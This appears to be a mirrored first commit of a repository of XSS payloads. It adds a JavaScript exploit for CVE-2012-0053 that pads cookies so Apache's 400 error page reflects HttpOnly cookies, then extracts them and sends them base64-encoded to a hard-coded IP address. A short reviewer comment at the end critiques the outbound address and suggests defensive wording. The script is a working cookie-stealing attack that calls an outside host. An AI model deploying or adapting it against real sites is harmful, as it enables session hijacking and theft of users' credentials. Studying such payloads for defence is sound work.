mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-24 21:23:08 +00:00
first commit
commit
79558b73e2
2 changed files with 44 additions and 0 deletions
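--- a/README.md
+++ b/README.md
@@ -0,0 +1 @@
+# xss_payloads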
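--- a/apache_httponly_bypass.js
+++ b/apache_httponly_bypass.js
@@ -0,0 +1,43 @@
+// Exploit for CVE-2012-0053
+
+// Set megacookie
+for( var j=0; j<100; j++ ){
+var c = "x"+j+"=";
+for( var i=0; i<500; i++ ){
+c+='A';
+}
+document.cookie = c;
+}
+
+x=new XMLHttpRequest();
+x.onreadystatechange = function(){
+if( x.readyState == 4 ){
+var data = '';
+
+// 400 == exploit worked
+if( x.status == 400 ){
+aC = x.responseText.match(/<pre>([\s\S]*)<\/pre>/gm)[0].split(';');
+for( var i=0; i<aC.length; i++ ){
+if( !aC[i].trim().match(/x\d+=/) ){
+data += aC[i].trim() + '; ';
+}
+}
+
+// Anything else, not useful
+}else{
+data = "Exploit failed";
+}
+
+// Remove megacookie
+for( var j=0; j<100; j++ ){
+document.cookie = "x"+j+"=; expires=Thu, 01 Jan 1970 00:00:00 UTC";
+}
+
+// Send back
+// CHANGE THIS URL TO YOUR OWN
+new Image().src = 'http://193.36.15.252/cookie?=' + btoa(data);
+}
+}
+x.open('GET', '/' , true );
+x.send(null);
+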
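Review bot: The reporting line at the end of the `onreadystatechange` handler sends the recovered cookie string to the hard-coded address `193.36.15.252` over cleartext HTTP, so a copy run unedited in an authorised test discloses a client's HttpOnly session cookies to a third-party host and to anyone on the network path; the `// CHANGE THIS URL TO YOUR OWN` comment is the only guard. The default should fail closed on a labelled placeholder, for example `var COLLECTOR = 'https://collector.invalid/cookie?c='; // placeholder, set per engagement`, with the image request built from it. The one-line header would also serve readers better if it stated the defensive facts: `// CVE-2012-0053: Apache's default 400 page echoes oversized Cookie headers, HttpOnly values included; fix by patching httpd or setting a custom ErrorDocument 400.` Finally, `x` and `aC` are assigned without `var` and become implicit globals on the page under test; declare them.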